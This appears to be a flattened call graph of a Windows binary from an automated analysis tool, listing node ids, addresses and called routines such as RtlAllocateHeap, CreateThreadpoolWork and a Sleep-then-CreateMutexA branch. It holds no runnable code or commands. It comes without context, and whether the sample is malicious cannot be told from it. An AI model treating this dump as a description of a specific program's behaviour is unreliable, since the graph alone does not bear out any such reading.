GetPEB 9937->9939 9940 ba6562 ExitProcess 9938->9940 9939->9938 9942 baa31c __cftof 9941->9942 9942->9937 11260 b71020 11261 b880c0 RtlAllocateHeap 11260->11261 11262 b71031 11261->11262 11263 b8d64e RtlAllocateHeap 11262->11263 11264 b7103b 11263->11264 11304 b7a418 11305 b7a420 shared_ptr 11304->11305 11306 b7a93f 11305->11306 11308 b7a4f3 shared_ptr 11305->11308 11307 ba6c6a RtlAllocateHeap 11306->11307 11309 b7a944 11307->11309 11310 b880c0 RtlAllocateHeap 11308->11310 11311 ba6c6a RtlAllocateHeap 11309->11311 11312 b7a903 11310->11312 11313 b7a949 11311->11313 11314 ba6c6a RtlAllocateHeap 11313->11314 11315 b7a94e 11314->11315 11316 ba6c6a RtlAllocateHeap 11315->11316 11317 b7a953 Sleep CreateMutexA 11316->11317 11318 b7a98e 11317->11318 11347 b72e00 11348 b72e28 11347->11348 11349 b8c68b __Mtx_init_in_situ 2 API calls 11348->11349 11350 b72e33 11349->11350 11339 b71000 11340 b8d64e RtlAllocateHeap 11339->11340 11341 b7100a 11340->11341 11366 b74276 11367 b72410 5 API calls 11366->11367 11368 b7427f 11367->11368 11369 b73ce0 RtlAllocateHeap 11368->11369 11370 b7428f 11369->11370 11389 b7cc79 11390 b7cc84 shared_ptr 11389->11390 11391 b7ccda shared_ptr __floor_pentium4 11390->11391 11392 ba6c6a RtlAllocateHeap 11390->11392 11393 b7ce36 11392->11393 11394 b87a00 RtlAllocateHeap 11393->11394 11395 b7ce92 11394->11395 11396 b75c10 4 API calls 11395->11396 11397 b7ce9d 11396->11397 11399 b7ca70 11397->11399 11400 b7cadd 11399->11400 11401 b87a00 RtlAllocateHeap 11400->11401 11403 b7cc87 11400->11403 11402 b7ccee 11401->11402 11404 b75c10 4 API calls 11402->11404 11405 ba6c6a RtlAllocateHeap 11403->11405 11407 b7ccda shared_ptr __floor_pentium4 11403->11407 11406 b7ccf9 11404->11406 11408 b7ce36 11405->11408 11419 b79030 11406->11419 11410 b87a00 RtlAllocateHeap 11408->11410 11412 b7ce92 11410->11412 11411 b7cd0d 11413 b88220 RtlAllocateHeap 11411->11413 11414 b75c10 4 API calls 11412->11414 11415 b7cd1f 11413->11415 11416 b7ce9d 11414->11416 11418 b88f40 RtlAllocateHeap 11415->11418 11417 b7ca70 4 API calls 11416->11417 11418->11403 11420 b7907f 11419->11420 11421 b87a00 RtlAllocateHeap 11420->11421 11422 b7908f 11421->11422 11423 b75c10 4 API calls 11422->11423 11424 b7909a 11423->11424 11425 b880c0 RtlAllocateHeap 11424->11425 11426 b790ec 11425->11426 11427 b88220 RtlAllocateHeap 11426->11427 11428 b790fe shared_ptr 11427->11428 11429 b7917e shared_ptr __floor_pentium4 11428->11429 11430 ba6c6a RtlAllocateHeap 11428->11430 11429->11411 11431 b791aa 11430->11431 9693 b7a856 9694 b7a870 9693->9694 9701 b7a892 shared_ptr 9693->9701 9695 b7a94e 9694->9695 9694->9701 9702 ba6c6a 9695->9702 9698 b7a903 9699 b7a953 Sleep CreateMutexA 9700 b7a98e 9699->9700 9705 b880c0 9701->9705 9720 ba6bf6 9702->9720 9704 ba6c79 ___std_exception_copy 9708 b880de 9705->9708 9710 b88104 9705->9710 9706 b881ee 9879 b89270 9706->9879 9708->9698 9709 b881f3 9882 b72480 9709->9882 9710->9706 9712 b88158 9710->9712 9713 b8817d 9710->9713 9712->9709 9874 b8d3e2 9712->9874 9715 b8d3e2 RtlAllocateHeap 9713->9715 9718 b88169 __cftof 9713->9718 9715->9718 9717 ba6c6a RtlAllocateHeap 9717->9706 9718->9717 9719 b881d0 shared_ptr 9718->9719 9719->9698 9726 baa7c8 9720->9726 9722 ba6c01 ___std_exception_copy 9723 ba6bf6 ___std_exception_copy RtlAllocateHeap 9722->9723 9724 ba6c0f 9722->9724 9725 ba6c66 9723->9725 9724->9704 9725->9704 9727 baa7d2 __dosmaperr 9726->9727 9735 baa7eb 9727->9735 9737 bad82f 9727->9737 9729 baa813 __dosmaperr 9730 baa81b __dosmaperr 9729->9730 9731 baa853 9729->9731 9741 baadf5 9730->9741 9745 baa49f 9731->9745 9735->9722 9736 baadf5 __freea RtlAllocateHeap 9736->9735 9740 bad83c __dosmaperr 9737->9740 9738 bad867 RtlAllocateHeap 9739 bad87a __dosmaperr 9738->9739 9738->9740 9739->9729 9740->9738 9740->9739 9742 baae00 9741->9742 9744 baae1b __dosmaperr 9741->9744 9742->9744 9749 ba75f6 9742->9749 9744->9735 9746 baa50d __dosmaperr 9745->9746 9752 baa445 9746->9752 9748 baa536 9748->9736 9750 baa7c8 __dosmaperr RtlAllocateHeap 9749->9750 9751 ba75fb 9750->9751 9751->9744 9753 baa451 __dosmaperr 9752->9753 9756 baa626 9753->9756 9755 baa473 __dosmaperr 9755->9748 9757 baa65c __dosmaperr 9756->9757 9758 baa635 __dosmaperr 9756->9758 9757->9755 9758->9757 9760 baf35f 9758->9760 9761 baf3df 9760->9761 9764 baf375 9760->9764 9762 baf42d 9761->9762 9765 baadf5 __freea RtlAllocateHeap 9761->9765 9828 baf4d0 9762->9828 9764->9761 9766 baf3a8 9764->9766 9771 baadf5 __freea RtlAllocateHeap 9764->9771 9767 baf401 9765->9767 9768 baf3ca 9766->9768 9776 baadf5 __freea RtlAllocateHeap 9766->9776 9769 baadf5 __freea RtlAllocateHeap 9767->9769 9770 baadf5 __freea RtlAllocateHeap 9768->9770 9772 baf414 9769->9772 9773 baf3d4 9770->9773 9775 baf39d 9771->9775 9777 baadf5 __freea RtlAllocateHeap 9772->9777 9778 baadf5 __freea RtlAllocateHeap 9773->9778 9774 baf49b 9779 baadf5 __freea RtlAllocateHeap 9774->9779 9788 baef3c 9775->9788 9781 baf3bf 9776->9781 9782 baf422 9777->9782 9778->9761 9783 baf4a1 9779->9783 9816 baf03a 9781->9816 9786 baadf5 __freea RtlAllocateHeap 9782->9786 9783->9757 9784 baf43b 9784->9774 9787 baadf5 RtlAllocateHeap __freea 9784->9787 9786->9762 9787->9784 9789 baef4d 9788->9789 9815 baf036 9788->9815 9790 baef5e 9789->9790 9791 baadf5 __freea RtlAllocateHeap 9789->9791 9792 baef70 9790->9792 9793 baadf5 __freea RtlAllocateHeap 9790->9793 9791->9790 9794 baef82 9792->9794 9795 baadf5 __freea RtlAllocateHeap 9792->9795 9793->9792 9796 baef94 9794->9796 9798 baadf5 __freea RtlAllocateHeap 9794->9798 9795->9794 9797 baefa6 9796->9797 9799 baadf5 __freea RtlAllocateHeap 9796->9799 9800 baadf5 __freea RtlAllocateHeap 9797->9800 9801 baefb8 9797->9801 9798->9796 9799->9797 9800->9801 9802 baadf5 __freea RtlAllocateHeap 9801->9802 9804 baefca 9801->9804 9802->9804 9803 baefdc 9805 baefee 9803->9805 9807 baadf5 __freea RtlAllocateHeap 9803->9807 9804->9803 9806 baadf5 __freea RtlAllocateHeap 9804->9806 9808 baf000 9805->9808 9809 baadf5 __freea RtlAllocateHeap 9805->9809 9806->9803 9807->9805 9810 baf012 9808->9810 9811 baadf5 __freea RtlAllocateHeap 9808->9811 9809->9808 9812 baf024 9810->9812 9813 baadf5 __freea RtlAllocateHeap 9810->9813 9811->9810 9814 baadf5 __freea RtlAllocateHeap 9812->9814 9812->9815 9813->9812 9814->9815 9815->9766 9817 baf09f 9816->9817 9818 baf047 9816->9818 9817->9768 9819 baf057 9818->9819 9820 baadf5 __freea RtlAllocateHeap 9818->9820 9821 baf069 9819->9821 9822 baadf5 __freea RtlAllocateHeap 9819->9822 9820->9819 9823 baf07b 9821->9823 9825 baadf5 __freea RtlAllocateHeap 9821->9825 9822->9821 9824 baf08d 9823->9824 9826 baadf5 __freea RtlAllocateHeap 9823->9826 9824->9817 9827 baadf5 __freea RtlAllocateHeap 9824->9827 9825->9823 9826->9824 9827->9817 9829 baf4fc 9828->9829 9830 baf4dd 9828->9830 9829->9784 9830->9829 9834 baf0db 9830->9834 9833 baadf5 __freea RtlAllocateHeap 9833->9829 9835 baf1b9 9834->9835 9836 baf0ec 9834->9836 9835->9833 9870 baf0a3 9836->9870 9839 baf0a3 __dosmaperr RtlAllocateHeap 9840 baf0ff 9839->9840 9841 baf0a3 __dosmaperr RtlAllocateHeap 9840->9841 9842 baf10a 9841->9842 9843 baf0a3 __dosmaperr RtlAllocateHeap 9842->9843 9844 baf115 9843->9844 9845 baf0a3 __dosmaperr RtlAllocateHeap 9844->9845 9846 baf123 9845->9846 9847 baadf5 __freea RtlAllocateHeap 9846->9847 9848 baf12e 9847->9848 9849 baadf5 __freea RtlAllocateHeap 9848->9849 9850 baf139 9849->9850 9851 baadf5 __freea RtlAllocateHeap 9850->9851 9852 baf144 9851->9852 9853 baf0a3 __dosmaperr RtlAllocateHeap 9852->9853 9854 baf152 9853->9854 9855 baf0a3 __dosmaperr RtlAllocateHeap 9854->9855 9856 baf160 9855->9856 9857 baf0a3 __dosmaperr RtlAllocateHeap 9856->9857 9858 baf171 9857->9858 9859 baf0a3 __dosmaperr RtlAllocateHeap 9858->9859 9860 baf17f 9859->9860 9861 baf0a3 __dosmaperr RtlAllocateHeap 9860->9861 9862 baf18d 9861->9862 9863 baadf5 __freea RtlAllocateHeap 9862->9863 9864 baf198 9863->9864 9865 baadf5 __freea RtlAllocateHeap 9864->9865 9866 baf1a3 9865->9866 9867 baadf5 __freea RtlAllocateHeap 9866->9867 9868 baf1ae 9867->9868 9869 baadf5 __freea RtlAllocateHeap 9868->9869 9869->9835 9871 baf0d6 9870->9871 9872 baf0c6 9870->9872 9871->9839 9872->9871 9873 baadf5 __freea RtlAllocateHeap 9872->9873 9873->9872 9876 b72480 Concurrency::cancel_current_task __dosmaperr ___std_exception_copy 9874->9876 9875 b8d401 Concurrency::cancel_current_task 9875->9718 9876->9875 9886 ba38af 9876->9886 9907 b8c1b9 9879->9907 9883 b7248e Concurrency::cancel_current_task 9882->9883 9884 ba38af ___std_exception_copy RtlAllocateHeap 9883->9884 9885 b724c3 9884->9885 9887 ba38bc ___std_exception_copy 9886->9887 9891 b724c3 9886->9891 9890 ba38e9 9887->9890 9887->9891 9892 baa1f1 9887->9892 9901 ba8ba3 9890->9901 9891->9718 9893 baa1fe 9892->9893 9894 baa20c 9892->9894 9893->9894 9899 baa223 9893->9899 9895 ba75f6 __dosmaperr RtlAllocateHeap 9894->9895 9896 baa214 9895->9896 9904 ba6c5a 9896->9904 9898 baa21e 9898->9890 9899->9898 9900 ba75f6 __dosmaperr RtlAllocateHeap 9899->9900 9900->9896 9902 baadf5 __freea RtlAllocateHeap 9901->9902 9903 ba8bbb 9902->9903 9903->9891 9905 ba6bf6 ___std_exception_copy RtlAllocateHeap 9904->9905 9906 ba6c66 9905->9906 9906->9898 9910 b8c123 9907->9910 9909 b8c1ca Concurrency::cancel_current_task 9913 b722e0 9910->9913 9912 b8c135 9912->9909 9914 ba38af ___std_exception_copy RtlAllocateHeap 9913->9914 9915 b72317 __floor_pentium4 9914->9915 9915->9912 11477 b8be50 11480 b8bd8b 11477->11480 11479 b8be66 Concurrency::cancel_current_task std::_Throw_future_error 11481 b722e0 std::future_error::future_error RtlAllocateHeap 11480->11481 11482 b8bd9f 11481->11482 11482->11479 11483 b73c47 11484 b73c51 11483->11484 11486 b732d0 6 API calls 11484->11486 11487 b73c5f 11484->11487 11485 b73c68 11486->11487 11487->11485 11488 b73810 4 API calls 11487->11488 11489 b73cdb 11488->11489 11490 b87d50 RtlAllocateHeap 11489->11490 11491 b73d52 11489->11491 11490->11491 11492 b8d3e2 RtlAllocateHeap 11491->11492 11493 b73d84 11492->11493 11494 b87d50 RtlAllocateHeap 11493->11494 11496 b73e03 11493->11496 11494->11496 11495 b73e9b shared_ptr 11496->11495 11497 ba6c6a RtlAllocateHeap 11496->11497 11498 b73ec1 11497->11498 11522 b73440 11527 b72b30 11522->11527 11524 b7344f Concurrency::cancel_current_task 11525 ba38af ___std_exception_copy RtlAllocateHeap 11524->11525 11526 b73483 11525->11526 11528 ba38af ___std_exception_copy RtlAllocateHeap 11527->11528 11529 b72b68 __floor_pentium4 11528->11529 11529->11524 11530 b73840 11535 b7385f 11530->11535 11538 b738f6 11530->11538 11531 b73920 11540 b891e0 11531->11540 11533 b73925 11534 b87d50 RtlAllocateHeap 11534->11538 11535->11531 11536 b738cd shared_ptr 11535->11536 11537 b7391b 11535->11537 11535->11538 11536->11534 11539 ba6c6a RtlAllocateHeap 11537->11539 11539->11531 11541 b8c1b9 RtlAllocateHeap 11540->11541 11542 b891ea 11541->11542 11542->11533 11563 ba6a44 11564 ba6a5c 11563->11564 11565 ba6a52 11563->11565 11581 ba698d 11564->11581 11576 bab655 11565->11576 11568 ba6a59 11569 ba6a76 11584 ba68ed 11569->11584 11572 ba6a8a 11574 ba6aa8 11572->11574 11575 baadf5 __freea RtlAllocateHeap 11572->11575 11573 bab655 RtlAllocateHeap 11573->11572 11575->11574 11577 bab662 11576->11577 11578 bab679 11577->11578 11587 ba75c0 11577->11587 11578->11568 11582 ba690a __cftof 4 API calls 11581->11582 11583 ba699f 11582->11583 11583->11569 11595 ba683b 11584->11595 11592 ba75e3 11587->11592 11589 ba75cb __dosmaperr 11590 ba75f6 __dosmaperr RtlAllocateHeap 11589->11590 11591 ba75de 11590->11591 11591->11568 11593 baa7c8 __dosmaperr RtlAllocateHeap 11592->11593 11594 ba75e8 11593->11594 11594->11589 11596 ba6849 11595->11596 11597 ba6863 11595->11597 11608 ba69cc 11596->11608 11599 ba686a 11597->11599 11601 ba6889 __cftof 11597->11601 11605 ba6853 11599->11605 11612 ba69e6 11599->11612 11602 ba69e6 RtlAllocateHeap 11601->11602 11603 ba689f __cftof 11601->11603 11602->11603 11604 ba75c0 __dosmaperr RtlAllocateHeap 11603->11604 11603->11605 11606 ba68ab 11604->11606 11605->11572 11605->11573 11607 ba75f6 __dosmaperr RtlAllocateHeap 11606->11607 11607->11605 11609 ba69d7 11608->11609 11611 ba69df 11608->11611 11610 baadf5 __freea RtlAllocateHeap 11609->11610 11610->11611 11611->11605 11613 ba69cc RtlAllocateHeap 11612->11613 11614 ba69f4 11613->11614 11617 ba6a25 11614->11617 11618 bab04b __cftof RtlAllocateHeap 11617->11618 11619 ba6a05 11618->11619 11619->11605 11620 b76db5 11621 b76dc2 11620->11621 11622 b76df5 11621->11622 11623 b76dca 11621->11623 11625 b880c0 RtlAllocateHeap 11622->11625 11624 b880c0 RtlAllocateHeap 11623->11624 11626 b76deb shared_ptr 11624->11626 11625->11626 11627 b76ec1 shared_ptr 11626->11627 11628 ba6c6a RtlAllocateHeap 11626->11628 11629 b76ee3 11628->11629 11630 ba8bbe 11633 ba8868 11630->11633 11634 ba868d RtlAllocateHeap 11633->11634 11637 ba887a 11634->11637 11635 ba88b3 11636 ba690a __cftof 4 API calls 11635->11636 11643 ba88bf 11636->11643 11637->11635 11638 ba888f 11637->11638 11650 ba889f 11637->11650 11639 ba75f6 __dosmaperr RtlAllocateHeap 11638->11639 11640 ba8894 11639->11640 11641 ba6c5a ___std_exception_copy RtlAllocateHeap 11640->11641 11641->11650 11642 ba6d52 4 API calls 11642->11643 11643->11642 11644 ba88ee 11643->11644 11647 ba8958 11644->11647 11651 ba8a8d 11644->11651 11645 ba8a8d RtlAllocateHeap 11648 ba8a20 11645->11648 11647->11645 11649 ba75f6 __dosmaperr RtlAllocateHeap 11648->11649 11648->11650 11649->11650 11652 ba8a9e 11651->11652 11653 ba8ab2 11651->11653 11652->11653 11654 ba75f6 __dosmaperr RtlAllocateHeap 11652->11654 11653->11647 11655 ba8aa7 11654->11655 11656 ba6c5a ___std_exception_copy RtlAllocateHeap 11655->11656 11656->11653 11657 b7b7b1 11658 b7b7be 11657->11658 11659 b87a00 RtlAllocateHeap 11658->11659 11660 b7b7f3 11659->11660 11661 b87a00 RtlAllocateHeap 11660->11661 11662 b7b80b 11661->11662 11663 b87a00 RtlAllocateHeap 11662->11663 11664 b7b823 11663->11664 11665 b87a00 RtlAllocateHeap 11664->11665 11666 b7b835 11665->11666 11671 ba67b7 11672 ba67c3 __dosmaperr 11671->11672 11673 ba67cd 11672->11673 11677 ba67e2 11672->11677 11675 ba75f6 __dosmaperr RtlAllocateHeap 11673->11675 11674 ba67dd 11676 ba67d2 11675->11676 11678 ba6c5a ___std_exception_copy RtlAllocateHeap 11676->11678 11677->11674 11680 ba6740 11677->11680 11678->11674 11681 ba674d 11680->11681 11682 ba6762 11680->11682 11683 ba75f6 __dosmaperr RtlAllocateHeap 11681->11683 11688 ba675d 11682->11688 11696 baa038 11682->11696 11684 ba6752 11683->11684 11686 ba6c5a ___std_exception_copy RtlAllocateHeap 11684->11686 11686->11688 11688->11674 11692 ba6785 11713 baaebb 11692->11713 11695 baadf5 __freea RtlAllocateHeap 11695->11688 11697 baa050 11696->11697 11701 ba6777 11696->11701 11698 baafe4 RtlAllocateHeap 11697->11698 11697->11701 11699 baa06e 11698->11699 11728 bb0439 11699->11728 11702 bab00b 11701->11702 11703 bab022 11702->11703 11704 ba677f 11702->11704 11703->11704 11705 baadf5 __freea RtlAllocateHeap 11703->11705 11706 baafe4 11704->11706 11705->11704 11707 baaff0 11706->11707 11708 bab005 11706->11708 11709 ba75f6 __dosmaperr RtlAllocateHeap 11707->11709 11708->11692 11710 baaff5 11709->11710 11711 ba6c5a ___std_exception_copy RtlAllocateHeap 11710->11711 11712 bab000 11711->11712 11712->11692 11714 baaecc 11713->11714 11715 baaee1 11713->11715 11716 ba75e3 __dosmaperr RtlAllocateHeap 11714->11716 11717 baaf2a 11715->11717 11722 baaf08 11715->11722 11718 baaed1 11716->11718 11719 ba75e3 __dosmaperr RtlAllocateHeap 11717->11719 11721 ba75f6 __dosmaperr RtlAllocateHeap 11718->11721 11720 baaf2f 11719->11720 11723 ba75f6 __dosmaperr RtlAllocateHeap 11720->11723 11726 ba678b 11721->11726 11746 baae2f 11722->11746 11725 baaf37 11723->11725 11727 ba6c5a ___std_exception_copy RtlAllocateHeap 11725->11727 11726->11688 11726->11695 11727->11726 11729 bb0445 __dosmaperr 11728->11729 11730 bb044d 11729->11730 11731 bb0465 11729->11731 11732 ba75e3 __dosmaperr RtlAllocateHeap 11730->11732 11733 bb0500 11731->11733 11741 bb0497 11731->11741 11735 bb0452 11732->11735 11734 ba75e3 __dosmaperr RtlAllocateHeap 11733->11734 11736 bb0505 11734->11736 11737 ba75f6 __dosmaperr RtlAllocateHeap 11735->11737 11738 ba75f6 __dosmaperr RtlAllocateHeap 11736->11738 11739 bb045a 11737->11739 11740 bb050d 11738->11740 11739->11701 11742 ba6c5a ___std_exception_copy RtlAllocateHeap 11740->11742 11741->11739 11743 ba75f6 __dosmaperr RtlAllocateHeap 11741->11743 11742->11739 11744 bb04be 11743->11744 11745 ba75e3 __dosmaperr RtlAllocateHeap 11744->11745 11745->11739 11747 baae3b __dosmaperr 11746->11747 11748 baae7b 11747->11748 11749 baae70 11747->11749 11751 ba75f6 __dosmaperr RtlAllocateHeap 11748->11751 11753 baaf48 11749->11753 11752 baae76 11751->11752 11752->11726 11764 bac0de 11753->11764 11755 baaf58 11756 baaf90 11755->11756 11757 baaf5e 11755->11757 11758 bac0de RtlAllocateHeap 11755->11758 11756->11757 11759 bac0de RtlAllocateHeap 11756->11759 11760 baafd8 11757->11760 11762 ba75c0 __dosmaperr RtlAllocateHeap 11757->11762 11761 baaf87 11758->11761 11759->11757 11760->11752 11763 bac0de RtlAllocateHeap 11761->11763 11762->11760 11763->11756 11765 bac0eb 11764->11765 11766 bac100 11764->11766 11767 ba75e3 __dosmaperr RtlAllocateHeap 11765->11767 11768 ba75e3 __dosmaperr RtlAllocateHeap 11766->11768 11772 bac125 11766->11772 11769 bac0f0 11767->11769 11770 bac130 11768->11770 11771 ba75f6 __dosmaperr RtlAllocateHeap 11769->11771 11773 ba75f6 __dosmaperr RtlAllocateHeap 11770->11773 11775 bac0f8 11771->11775 11772->11755 11774 bac138 11773->11774 11776 ba6c5a ___std_exception_copy RtlAllocateHeap 11774->11776 11775->11755 11776->11775 11777 b79ba5 11778 b79ba7 11777->11778 11779 b87a00 RtlAllocateHeap 11778->11779 11780 b79ca9 11779->11780 11781 b75c10 4 API calls 11780->11781 11782 b79cb1 11781->11782 11783 b78b30 4 API calls 11782->11783 11784 b79cc2 11783->11784 11785 b88220 RtlAllocateHeap 11784->11785 11786 b79cd1 11785->11786 11839 b72b90 11840 b72bce 11839->11840 11843 b8b7fb 11840->11843 11842 b72bdb shared_ptr __floor_pentium4 11844 b8b817 11843->11844 11845 b8b807 11843->11845 11844->11842 11845->11844 11847 b8ca78 11845->11847 11848 b8ca8d TpReleaseWork 11847->11848 11848->11844 11849 b73f9f 11850 b73fad 11849->11850 11854 b73fc5 11849->11854 11851 b72410 5 API calls 11850->11851 11852 b73fb6 11851->11852 11853 b73ce0 RtlAllocateHeap 11852->11853 11853->11854 11873 b78980 11876 b789d8 shared_ptr 11873->11876 11883 b78aea 11873->11883 11874 b87a00 RtlAllocateHeap 11874->11876 11875 b75c10 4 API calls 11875->11876 11876->11874 11876->11875 11877 b78b20 11876->11877 11878 b880c0 RtlAllocateHeap 11876->11878 11880 b78b25 11876->11880 11876->11883 11879 b88200 RtlAllocateHeap 11877->11879 11878->11876 11879->11880 11881 ba6c6a RtlAllocateHeap 11880->11881 11882 b78b2a 11881->11882 11909 b755f0 11910 b75610 11909->11910 11911 b722c0 4 API calls 11910->11911 11912 b75710 __floor_pentium4 11910->11912 11911->11910 11913 b743f0 11914 b8bedf InitOnceExecuteOnce 11913->11914 11915 b7440a 11914->11915 11916 b74411 11915->11916 11917 ba6cbb 4 API calls 11915->11917 11918 b74424 11917->11918 11959 b73fe0 11960 b74022 11959->11960 11961 b740d2 11960->11961 11962 b7408c 11960->11962 11965 b74035 __floor_pentium4 11960->11965 11977 b73ee0 11961->11977 11966 b735e0 11962->11966 11967 b8d3e2 RtlAllocateHeap 11966->11967 11968 b73616 11967->11968 11969 b73691 11968->11969 11970 b7364e 11968->11970 11983 b72ce0 11969->11983 11972 b8c17c Concurrency::cancel_current_task RtlAllocateHeap 11970->11972 11976 b73663 shared_ptr __floor_pentium4 11970->11976 11974 b73720 11972->11974 11973 b7369e 11973->11976 11992 b72c00 11973->11992 11974->11965 11976->11965 11978 b73f48 11977->11978 11980 b73f1e 11977->11980 11979 b73f58 11978->11979 11981 b72c00 4 API calls 11978->11981 11979->11965 11980->11965 11982 b73f7f 11981->11982 11982->11965 11984 b72d1d 11983->11984 11985 b8bedf InitOnceExecuteOnce 11984->11985 11986 b72d46 11985->11986 11987 b72d88 11986->11987 11988 b72d51 __floor_pentium4 11986->11988 12002 b8bef7 11986->12002 11990 b72440 4 API calls 11987->11990 11988->11973 11991 b72d9b 11990->11991 11991->11973 11993 b8d3e2 RtlAllocateHeap 11992->11993 11994 b72c0e 11993->11994 12027 b8b847 11994->12027 11996 b72c42 11997 b72c49 11996->11997 12033 b72c80 11996->12033 11997->11976 11999 b72c58 12036 b72560 11999->12036 12001 b72c65 Concurrency::cancel_current_task 12003 b8bf03 12002->12003 12011 b72900 12003->12011 12005 b8bf23 Concurrency::cancel_current_task 12006 b8bf6a 12005->12006 12007 b8bf73 12005->12007 12021 b8be7f 12006->12021 12009 b72ae0 5 API calls 12007->12009 12010 b8bf6f 12009->12010 12010->11987 12012 b880c0 RtlAllocateHeap 12011->12012 12013 b7294f 12012->12013 12014 b726b0 RtlAllocateHeap 12013->12014 12016 b72967 12014->12016 12015 b7298d shared_ptr 12015->12005 12016->12015 12017 ba6c6a RtlAllocateHeap 12016->12017 12018 b729b6 12017->12018 12019 ba38af ___std_exception_copy RtlAllocateHeap 12018->12019 12020 b729e4 12019->12020 12020->12005 12022 b8cc31 InitOnceExecuteOnce 12021->12022 12023 b8be97 12022->12023 12024 b8be9e 12023->12024 12025 ba6cbb 4 API calls 12023->12025 12024->12010 12026 b8bea7 12025->12026 12026->12010 12028 b8b854 12027->12028 12032 b8b873 Concurrency::details::_Reschedule_chore 12027->12032 12039 b8cb77 12028->12039 12030 b8b864 12030->12032 12041 b8b81e 12030->12041 12032->11996 12034 b8b7fb TpReleaseWork 12033->12034 12035 b72cb2 shared_ptr 12034->12035 12035->11999 12037 ba38af ___std_exception_copy RtlAllocateHeap 12036->12037 12038 b72597 __floor_pentium4 12037->12038 12038->12001 12040 b8cb92 CreateThreadpoolWork 12039->12040 12040->12030 12042 b8b827 Concurrency::details::_Reschedule_chore 12041->12042 12045 b8cdcc 12042->12045 12044 b8b841 12044->12032 12046 b8cde1 TpPostWork 12045->12046 12046->12044 12051 b88de0 12052 b88f2f 12051->12052 12053 b88e05 12051->12053 12054 b89270 RtlAllocateHeap 12052->12054 12057 b88e4c 12053->12057 12058 b88e76 12053->12058 12055 b88f34 12054->12055 12056 b72480 RtlAllocateHeap 12055->12056 12064 b88e5d __cftof 12056->12064 12057->12055 12059 b88e57 12057->12059 12062 b8d3e2 RtlAllocateHeap 12058->12062 12058->12064 12061 b8d3e2 RtlAllocateHeap 12059->12061 12060 ba6c6a RtlAllocateHeap 12063 b88f3e 12060->12063 12061->12064 12062->12064 12064->12060 12065 b88eed shared_ptr __cftof 12064->12065 12066 b787d0 12067 b788d3 12066->12067 12076 b78819 shared_ptr 12066->12076 12068 b880c0 RtlAllocateHeap 12067->12068 12074 b78923 12068->12074 12069 b7896c 12072 b88200 RtlAllocateHeap 12069->12072 12070 b78949 shared_ptr 12071 b880c0 RtlAllocateHeap 12071->12076 12073 b78971 12072->12073 12074->12070 12075 ba6c6a RtlAllocateHeap 12074->12075 12075->12069 12076->12067 12076->12069 12076->12071 12076->12074 9916 baa7c8 9917 baa7d2 __dosmaperr 9916->9917 9918 bad82f __dosmaperr RtlAllocateHeap 9917->9918 9925 baa7eb 9917->9925 9919 baa813 __dosmaperr 9918->9919 9920 baa81b __dosmaperr 9919->9920 9921 baa853 9919->9921 9923 baadf5 __freea RtlAllocateHeap 9920->9923 9922 baa49f __dosmaperr RtlAllocateHeap 9921->9922 9924 baa85e 9922->9924 9923->9925 9926 baadf5 __freea RtlAllocateHeap 9924->9926 9926->9925 12116 b721c0 12117 b721d0 12116->12117 12118 b721cb 12116->12118 12119 b721d4 12117->12119 12124 b721ec __cftof 12117->12124 12120 ba75f6 __dosmaperr RtlAllocateHeap 12119->12120 12121 b721d9 12120->12121 12123 ba6c5a ___std_exception_copy RtlAllocateHeap 12121->12123 12122 b721fc __cftof 12125 b721e4 12123->12125 12124->12122 12126 b72221 12124->12126 12127 b7223a 12124->12127 12129 ba75f6 __dosmaperr RtlAllocateHeap 12126->12129 12128 b72231 12127->12128 12130 ba75f6 __dosmaperr RtlAllocateHeap 12127->12130 12131 b72226 12129->12131 12132 b72247 12130->12132 12133 ba6c5a ___std_exception_copy RtlAllocateHeap 12131->12133 12134 ba6c5a ___std_exception_copy RtlAllocateHeap 12132->12134 12133->12128 12135 b72252 12134->12135 12148 b883c0 12149 b87760 RtlAllocateHeap 12148->12149 12150 b88439 12149->12150 12151 b88f40 RtlAllocateHeap 12150->12151 12152 b88454 12150->12152 12151->12152 12153 b88f40 RtlAllocateHeap 12152->12153 12155 b884a8 12152->12155 12154 b884ee 12153->12154 12156 b76535 12158 b76549 shared_ptr 12156->12158 12157 ba6c6a RtlAllocateHeap 12160 b765dc 12157->12160 12158->12157 12159 b765b1 shared_ptr __floor_pentium4 12158->12159 12161 b87a00 RtlAllocateHeap 12160->12161 12162 b766a6 12161->12162 12163 b75c10 4 API calls 12162->12163 12164 b766ac 12163->12164 12165 b75c10 4 API calls 12164->12165 12166 b766b1 12165->12166 12167 b722c0 4 API calls 12166->12167 12168 b766c9 shared_ptr 12167->12168 12169 b87a00 RtlAllocateHeap 12168->12169 12170 b76732 12169->12170 12171 b75c10 4 API calls 12170->12171 12172 b7673d 12171->12172 12173 b722c0 4 API calls 12172->12173 12180 b76757 shared_ptr 12173->12180 12174 b76852 12175 b880c0 RtlAllocateHeap 12174->12175 12177 b7689c 12175->12177 12176 b87a00 RtlAllocateHeap 12176->12180 12178 b880c0 RtlAllocateHeap 12177->12178 12181 b768e3 shared_ptr __floor_pentium4 12178->12181 12179 b75c10 4 API calls 12179->12180 12180->12174 12180->12176 12180->12179 12182 b722c0 4 API calls 12180->12182 12182->12180 12191 ba6729 12194 ba6672 12191->12194 12193 ba673b 12197 ba667e __dosmaperr 12194->12197 12195 ba6685 12196 ba75f6 __dosmaperr RtlAllocateHeap 12195->12196 12198 ba668a 12196->12198 12197->12195 12199 ba66a5 12197->12199 12200 ba6c5a ___std_exception_copy RtlAllocateHeap 12198->12200 12201 ba66aa 12199->12201 12202 ba66b7 12199->12202 12203 ba6695 12200->12203 12204 ba75f6 __dosmaperr RtlAllocateHeap 12201->12204 12208 baa8c3 12202->12208 12203->12193 12204->12203 12206 ba66c0 12206->12203 12207 ba75f6 __dosmaperr RtlAllocateHeap 12206->12207 12207->12203 12209 baa8cf __dosmaperr 12208->12209 12212 baa967 12209->12212 12211 baa8ea 12211->12206 12217 baa98a 12212->12217 12213 bad82f __dosmaperr RtlAllocateHeap 12214 baa9eb 12213->12214 12215 baadf5 __freea RtlAllocateHeap 12214->12215 12216 baa9d0 12215->12216 12216->12211 12217->12213 12217->12216 12223 b74120 12224 b7416a 12223->12224 12225 b741f6 12224->12225 12226 b741a6 12224->12226 12230 b8b6be 12225->12230 12227 b73ee0 4 API calls 12226->12227 12229 b741b2 __floor_pentium4 12227->12229 12231 b8b6ca 12230->12231 12234 b875a0 12231->12234 12235 b875ab Concurrency::cancel_current_task 12234->12235 12236 b8c0e9 std::invalid_argument::invalid_argument RtlAllocateHeap 12235->12236 12237 b8c1aa Concurrency::cancel_current_task 12236->12237 12273 b88320 12274 b88339 12273->12274 12275 